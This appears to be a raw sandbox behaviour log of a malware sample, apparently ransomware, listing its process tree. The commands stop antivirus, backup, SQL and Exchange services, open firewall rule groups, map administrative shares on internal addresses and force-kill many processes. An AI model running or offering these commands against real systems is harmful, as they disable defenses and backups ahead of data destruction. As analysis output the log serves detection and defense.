C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop stc_raw_agent /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop SepMasterService /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop SepMasterService /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop SQLAgent$SYSTEM_BGC /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop BackupExecVSSProvider /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop BackupExecVSSProvider /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop SQLAgent$PRACTTICEMGT /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop BackupExecAgentBrowser /y (depth 2)
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop swi_filter /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_filter /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop ShMonitor /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ShMonitor /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Enterprise Client Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Enterprise Client Service” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PROD /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop swi_service /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_service /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecManagementService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “SQL Backups /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQL Backups /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop Smcinst /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Smcinst /y3⤵
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer100 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PROFXENGAGEMENT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecRPCService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop swi_update /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop NetMsmqActivator /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SmcService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SmcService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop AcronisAgent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeIS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y3⤵
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop swi_update_64 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SntpService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SntpService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop TmCCSF /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TmCCSF /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SamSs /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SamSs /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop sophos /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLBrowser /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Acronis VSS Provider” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Acronis VSS Provider” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop sophossps /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophossps /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop tmlisten /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop tmlisten /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “SQLsafe Backup Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Backup Service” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop IISAdmin /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IISAdmin /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLSafeOLRService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SOPHOS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer110 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop TrueKey /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKey /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeES /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SQLEXPRESS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop POP3Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop POP3Svc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLSERVERAGENT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop svcGenericHost /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Agent” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Agent” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeMGMT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop EraserSvc11710 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLTELEMETRY /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop TrueKeyScheduler /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop msftesql$PROD /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Clean Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Clean Service” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop TrueKeyServiceHelper /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SstpSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SstpSvc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLTELEMETRY$ECWDB2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SMTPSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Zoolz 2 Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Zoolz 2 Service” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop WRSVC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WRSVC /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeMTA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop mssql$vim_sqlexp /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mssql$vim_sqlexp /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “aphidmonitorservice” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “aphidmonitorservice” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Device Control Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Device Control Service” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop vapiendpoint /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vapiendpoint /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “SQLsafe Filter Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Filter Service” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop msexchangeadtopology /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeadtopology /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$ECWDB2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$SYSTEM_BGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SBSMONITORING /2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos MCS Agent” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Agent” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SBSMONITORING /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Symantec System Recovery” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Symantec System Recovery” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop audioendpointbuilder /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop audioendpointbuilder /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop AVP /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AVP /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop UI0Detect /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop UI0Detect /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “intel(r) proset monitoring service” /y2⤵
-
C:\Windows\system32\net.exe"net.exe" stop msexchangeimap4 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeimap4 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SHAREPOINT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeSA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos MCS Client” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Client” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos File Scanner Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos File Scanner Service” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop DCAgent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DCAgent /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop ARSM /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ARSM /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$BKUPEXEC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Veeam Backup Catalog Data Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop unistoresvc_1af40a /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$SYSTEM_BGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Message Router” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Message Router” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop W3Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop W3Svc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\Users2⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeSRS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Health Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Health Service” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\A$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\B$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\C$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\D$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\E$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\F$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\G$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\N$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\H$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\O$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\I$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\P$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\J$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\Q$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\K$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\R$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\L$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\S$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\M$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\T$2⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Safestore Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Safestore Service” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PRACTICEMGT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos System Protection Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos System Protection Service” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecDeviceMediaService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.127\U$2⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PRACTTICEBGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Web Control Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Web Control Service” /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PROD /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop AcronisAgent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecManagementService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PROFXENGAGEMENT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop Antivirus /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Antivirus /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecRPCService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.3\V$2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.3\W$2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.3\X$2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.3\Y$2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.18\Users2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.3\Z$2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.18\A$2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\Users2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\B$2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\A$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\C$2⤵
-
